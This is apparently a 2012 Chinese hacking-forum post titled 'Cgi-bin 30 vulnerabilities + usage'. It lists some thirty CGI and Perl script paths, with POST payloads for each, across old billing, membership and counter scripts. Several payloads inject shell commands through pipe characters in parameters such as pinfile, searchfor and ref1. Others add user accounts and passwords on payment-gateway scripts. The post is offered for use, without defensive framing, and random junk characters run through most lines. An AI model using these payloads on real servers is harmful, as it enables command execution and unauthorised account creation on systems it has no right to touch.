找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2940|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
==============================, u# r% g; _' d6 q

6 }- u7 h4 O! k/smspass.pl* H- H* C3 j2 D: R
username=username&password=password, X5 X5 }% Z6 r& V$ [7 B, C6 l# J
  j+ `1 I6 n1 M1 h2 F! p/ a* X
/index.cgi: o% g( O! ?' O* s, o* Q& u. b
wei=ren&gen=command4 T3 d# b& S; }$ Z' R4 E' h& p& q) J7 i

( y4 c' i( A& X5 k% h/passmaster.cgi+ D4 `0 [: t. o+ n* y
Action=Add&Username=Username&Password=Password2 W" N/ t8 a' q

- f+ o- w' P. V/accountcreate.cgi
" j) P, T: x) A1 husername=username&password=password&ref1=|echo;ls|, j+ R! x3 x1 r8 z- w

2 f  f8 K7 E0 h1 M, \6 W/form.cgi+ V6 ~$ H6 H6 P, V/ n# G
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
3 q1 ]1 i2 d4 F2 j$ `) f) Q4 ]4 B& H: n; _8 o$ g
/addusr.pl% t5 F/ E6 m: e9 [, d) ^( J
/cgi-bin/EuroDebit/addusr.pl
3 u2 U& n7 |6 q! |' a0 euser=username&pass=Password&confirm=Password+ V5 D" W5 }# v0 B
4 e) G; b* T- U( E; Y/ |4 F2 ?! ?- m
/ccbill-local.asp
5 l: @& r& {: g8 h1 g' P! C! E0 b0 v$ u5 |post_values=username:password
& a' m, l$ s/ S  ^1 k) _! _' a+ W+ Q. e: u
/count.cgi
4 @1 b; d1 I# k: k8 Rpinfile=|echo;ls -la;exit|0 W' h  Y4 M" W. J$ [  c
, h7 v/ o$ n0 n$ |* P
/recon.cgi7 G; D$ ]. y% \1 G* [
/recon.cgi?search
! F$ b/ u$ t$ ~6 W/ e/ X! l1 s& p9 d9 Rsearchoption=1&searchfor=|echo;ls -al;exit|$ K& {! ~/ o# D9 p: S

6 j* {! l3 E+ n2 ^4 ~2 k  z* T; S- e/verotelrum.pl% d$ \. `# r! `4 ]
vercode=username:password:dseegsow:add:amount<&30>9 p' \; O" h  R% N2 S& b4 i
0 b$ l& }# K, k& c) f; r/ g1 \
/af.cgi
' C. D2 S6 @8 i. {. j$ ^_browser_out=|echo;ls -la;exit;|' Q$ w4 `, s; U1 k

2 s" v% G4 W6 h3 K" g, ?/modify.cgi' o9 h) h: v7 n* o6 X
username=username&password=password&expire=30
/ P: A0 a1 A! J( f
1 v7 D; s8 V- s6 q& ~- P2 F/openjournal.cgi6 k  I6 k$ b2 e% z: X' X
edit=1&ct=2&go=|echo;ls -al;exit|
9 |" N1 h- q( Q+ p0 b1 ^: P# H* f+ i! y2 G. A% m
/gx9passwd.cgi
" L  x( q$ ]" V- v% b- bcmd=ADD&user=username&pass=password+ e: Q% J3 u0 h* O2 R' }" d
( {, {4 V' o/ p/ _2 z1 b
/probecontrol.cgi+ m& N# V( B" F- S0 |
command=enable&username=username&password=password: n# H) m, c( w3 b
+ J8 f0 n4 a; F
/recon.cgi' h+ N+ ?$ d/ f0 M  K7 P& o# M
searchoption=3&searchfor=echo;ls -la;exit! y: p' g8 U& g

9 U( E+ p" E5 e5 O% _/htadd.pl
9 A' j1 C& `( |* d  Econfigfile=|echo; ls -alt; exit6 y4 g1 f* D3 i" U% k

& y) n7 @/ l2 x9 g/gx9passwd.cgi; [& E: t2 U  x$ t3 e  n0 c. i$ Q
cmd=ADD&user=username&pass=password
- S1 S7 V! c$ _8 P: ?" w9 N
5 K& a$ J) A( `% t- [0 T; v/ibill*.pl
6 _+ n% [' S, x6 u2 Sreqtype=add&authpwd=authpwd&username=username&password=password8 ?- P: k7 K9 `# H# Y
+ a+ o6 }/ ^8 r2 E$ A8 x
/cpay.cgi
% @# u; g+ t+ I) hcommand=add_member&username=username(EMAIL)&password=password(DES)
# N8 l! ?1 }- f( R; O$ u4 B2 G7 O  x% i8 }4 P
/globill_ut.cgi
4 C$ d5 m( N( \# R" pdo=add&username=username&password=password&wpassword=password
" d: |. X, u5 |3 V, n5 W# u; Z) D9 q  T5 Q0 T) V
/usercontrol.cgi6 C. b7 w+ C. W
command=enable&username=USER&password=PASS: Z4 s  z/ a4 I' N' y
* L/ d2 t% Q; _/ G
/globoSALErum.cgi
9 ?0 T9 }) D/ u& m8 |# v, a2 k4 \, Kaction=ADD&seccode=seccode&login=username&password=password% v. q  j' W- ?

- Z$ j$ }7 I/ u! O: D/addusr.pl
7 P/ Q+ A9 C9 F/ R4 E6 Iuser=USER&pass=PASS&confirm=PASS1 a' w! L7 d) d$ ]7 O* S5 d9 ~" H
% j8 u% H; o3 t8 i( ^
/pincount.cgi3 W2 O8 u; J7 K1 l# c. a
/cgi-bin/mastergate/pincount.cgi1 h2 W  \6 x4 s. X# B5 h% F1 ]) _
pinfile=|echo;pwd;exit|
, a4 `7 G0 J' P4 Z% N5 x0 i! x0 Q: ]  x  w4 T9 t1 j
/accountcreate.cgi# Q, X3 o# C  f7 S
/cgi-bin/gateway/accountcreate.cgi
, M$ Z/ \' q7 b+ z* busername=username&password=password&password2=password&ref1=|echo;ls -al;exit) f9 c! p9 B$ ~# G/ ^; p
4 |; L  }8 Y& i' P$ i
/af.cgi/ z2 [8 Y/ s5 Z6 O+ V7 O" A
/env.cgi# s) D0 F6 y" c& _5 G# X& ?
ADD+;echo;pwd;exit, y# m8 c; u4 t+ g
5 V5 b! j9 I2 a6 Y
/count.cgi
, W7 g$ G7 d$ A) |# Wpinfile=|echo;pwd;exit|( L$ K0 E2 z! I0 x

) @1 z3 V& [, i/ z/recon.cgi; r" R: k0 V4 `! X' g* k( ?% d
searchoption=1&searchfor=|echo;ls%20-al;exit|) C. v1 o; L9 H" t: k( X4 j- I

- S7 S" }1 \" T* Y5 h/add.cgi; N" P3 {9 g# I6 [0 f+ B' {
username=username&password=password&expire=30
+ L, ?! l4 q$ ]4 f$ C/ \5 u) T
) c% M3 e9 n  ~- h5 M, o  C==============================
3 l8 D$ g0 I5 A* l$ Z5 u/ M" e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表